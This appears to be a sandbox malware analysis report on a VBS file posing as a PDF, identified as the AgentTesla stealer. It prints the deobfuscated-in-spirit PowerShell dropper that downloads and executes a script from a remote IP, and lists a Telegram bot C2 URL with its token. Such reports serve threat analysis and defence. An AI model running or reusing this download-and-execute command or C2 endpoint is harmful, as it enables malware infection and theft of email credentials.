Overview

overview

10

Static

static

183287857-...DF.vbs

windows7_x64

10

183287857-...DF.vbs

windows10_x64

10

Analysis

  • max time kernel
    131s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    21-10-2021 21:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    183287857-050118-sanlccjavap0004-6561_PDF.vbs

  • Size

    440B

  • MD5

    fd5d9dd54f30ebeda49b3f3d9d57d1c6

  • SHA1

    bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51

  • SHA256

    75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f

  • SHA512

    60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9

Score
10/10
agentteslacollectionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://202.55.132.106/Bypass3.txt

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • outlook_office_path
        • outlook_win_path
        PID:1776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1776-149-0x0000000000400000-0x000000000043C000-memory.dmp
    Filesize

    240KB

    Download
  • memory/1776-160-0x00000000011D0000-0x00000000011D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-159-0x0000000006660000-0x0000000006661000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-158-0x0000000005F90000-0x0000000005F91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-157-0x00000000053B0000-0x00000000053B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-156-0x0000000005330000-0x000000000582E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/1776-155-0x00000000053D0000-0x00000000053D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-154-0x0000000005830000-0x0000000005831000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-152-0x00000000009A0000-0x00000000009DC000-memory.dmp
    Filesize

    240KB

    Download
  • memory/1776-150-0x000000000043774E-mapping.dmp
    Download
  • memory/2116-122-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-124-0x000001DAFF1E0000-0x000001DAFF1E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2116-127-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-131-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-132-0x000001DAFDE76000-0x000001DAFDE78000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-133-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-143-0x000001DAFF190000-0x000001DAFF1B4000-memory.dmp
    Filesize

    144KB

    Download
  • memory/2116-148-0x000001DAFF1C0000-0x000001DAFF1C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2116-126-0x000001DAFDE73000-0x000001DAFDE75000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-125-0x000001DAFDE70000-0x000001DAFDE72000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-151-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-123-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-115-0x0000000000000000-mapping.dmp
    Download
  • memory/2116-121-0x000001DAFEE30000-0x000001DAFEE31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2116-120-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-119-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-118-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-117-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2116-116-0x000001DAFDE50000-0x000001DAFDE52000-memory.dmp
    Filesize

    8KB

    Download